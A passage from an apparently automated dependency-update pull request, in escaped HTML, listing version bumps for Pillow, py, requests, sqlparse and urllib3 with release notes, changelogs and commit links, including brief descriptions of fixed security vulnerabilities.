href=\"https://github.com/python-pillow/Pillow/commit/cac6ffa7b399ea79b6239984d1307056a0b19af2\"\u003e\u003ccode\u003ecac6ffa\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e from python-pillow/imagemath\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/f5eeeacf7539eaa0d93a677d7666bc7c142c8d1c\"\u003e\u003ccode\u003ef5eeeac\u003c/code\u003e\u003c/a\u003e Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in deprecated eval\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/facf3af93dabcbdd8cdbda8c3b50eefafa3bb04c\"\u003e\u003ccode\u003efacf3af\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2a93aba5cfcf6e241ab4f9392c13e3b74032c061\"\u003e\u003ccode\u003e2a93aba\u003c/code\u003e\u003c/a\u003e Use strncpy to avoid buffer overflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/a670597bc30e9d489656fc9d807170b8f3d7ca57\"\u003e\u003ccode\u003ea670597\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-pillow/Pillow/compare/8.2.0...10.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.24.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.24.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlparse` from 0.3.1 to 0.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/andialbrecht/sqlparse/blob/master/CHANGELOG\"\u003esqlparse's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease 0.5.0 (Apr 13, 2024)\u003c/h2\u003e\n\u003cp\u003eNotable Changes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for Python 3.5, 3.6, and 3.7.\u003c/li\u003e\n\u003cli\u003ePython 3.12 is now supported (pr725, by hugovk).\u003c/li\u003e\n\u003cli\u003eIMPORTANT: Fixes a potential denial of service attack (DOS) due to recursion\nerror for deeply nested statements. Instead of recursion error a generic\nSQLParseError is raised. See the security advisory for details:\n\u003ca href=\"https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg\"\u003ehttps://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg\u003c/a\u003e\nThe vulnerability was discovered by \u003ca href=\"https://github.com/uriyay-jfrog\"\u003e\u003ccode\u003e@​uriyay-jfrog\u003c/code\u003e\u003c/a\u003e. Thanks for reporting!\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEnhancements\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSplitting statements now allows to remove the semicolon at the end.\nSome database backends love statements without semicolon (issue742).\u003c/li\u003e\n\u003cli\u003eSupport TypedLiterals in get_parameters (pr749, by Khrol).\u003c/li\u003e\n\u003cli\u003eImprove splitting of Transact SQL when using GO keyword (issue762).\u003c/li\u003e\n\u003cli\u003eSupport for some JSON operators (issue682).\u003c/li\u003e\n\u003cli\u003eImprove formatting of statements containing JSON operators (issue542).\u003c/li\u003e\n\u003cli\u003eSupport for BigQuery and Snowflake keywords (pr699, by griffatrasgo).\u003c/li\u003e\n\u003cli\u003eSupport parsing of OVER clause (issue701, pr768 by r33s3n6).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBug Fixes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore dunder attributes when creating Tokens (issue672).\u003c/li\u003e\n\u003cli\u003eAllow operators to precede dollar-quoted strings (issue763).\u003c/li\u003e\n\u003cli\u003eFix parsing of nested order clauses (issue745, pr746 by john-bodley).\u003c/li\u003e\n\u003cli\u003eThread-safe initialization of Lexer class (issue730).\u003c/li\u003e\n\u003cli\u003eClassify TRUNCATE as DDL and GRANT/REVOKE as DCL keywords (based on pr719\nby josuc1, thanks for bringing this up!).\u003c/li\u003e\n\u003cli\u003eFix parsing of PRIMARY KEY (issue740).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOther\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOptimize performance of matching function (pr799, by admachainz).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease 0.4.4 (Apr 18, 2023)\u003c/h2\u003e\n\u003cp\u003eNotable Changes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIMPORTANT: This release fixes a security vulnerability in the\nparser where a regular expression vulnerable to ReDOS (Regular\nExpression Denial of Service) was used. See the security advisory\nfor details: \u003ca href=\"https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2\"\u003ehttps://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2\u003c/a\u003e\nThe vulnerability was discovered by \u003ca href=\"https://github.com/erik-krogh\"\u003e\u003ccode\u003e@​erik-krogh\u003c/code\u003e\u003c/a\u003e from GitHub\nSecurity Lab (GHSL). Thanks for reporting!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/ddbd0ec3592545c914fe71e47118c04582d8bfb0\"\u003e\u003ccode\u003eddbd0ec\u003c/code\u003e\u003c/a\u003e Bump version.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/29f2e0a6609ddc1fa248faef1bc41616043c544e\"\u003e\u003ccode\u003e29f2e0a\u003c/code\u003e\u003c/a\u003e Raise recursion limit for tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/b4a39d9850969b4e1d6940d32094ee0b42a2cf03\"\u003e\u003ccode\u003eb4a39d9\u003c/code\u003e\u003c/a\u003e Raise SQLParseError instead of RecursionError.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/f1bcf2f8a7ddf6854c99990c56ff5394f4981d58\"\u003e\u003ccode\u003ef1bcf2f\u003c/code\u003e\u003c/a\u003e Update AUHTORS and Changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/e03b74e608b71dd06824c2cb42421c0d790248e3\"\u003e\u003ccode\u003ee03b74e\u003c/code\u003e\u003c/a\u003e Fix Function.get_parameters(), add Funtion.get_window()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/617b8f6cd3c55bacf2c80130901508518753f7e1\"\u003e\u003ccode\u003e617b8f6\u003c/code\u003e\u003c/a\u003e Add OVER clause, and group it into Function (fixes \u003ca href=\"https://redirect.github.com/andialbrecht/sqlparse/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/d8f81471cfc2c39ac43128e2a0c8cc67c313cc40\"\u003e\u003ccode\u003ed8f8147\u003c/code\u003e\u003c/a\u003e Update AUHTORS and Changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/012c9f10c8ddfa47ccf17ead28122492155cf6fc\"\u003e\u003ccode\u003e012c9f1\u003c/code\u003e\u003c/a\u003e Optimize sqlparse.utils.imt().\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/46971e5a804b29e7dbd437155a8ceffab8ef1cd5\"\u003e\u003ccode\u003e46971e5\u003c/code\u003e\u003c/a\u003e Fix parsing of PRIMARY KEY (fixes \u003ca href=\"https://redirect.github.com/andialbrecht/sqlparse/issues/740\"\u003e#740\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/fc4b0beab89c5598d556572cb6db0165affb017b\"\u003e\u003ccode\u003efc4b0be\u003c/code\u003e\u003c/a\u003e Code cleanup.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/andialbrecht/sqlparse/compare/0.3.1...0.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.5 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 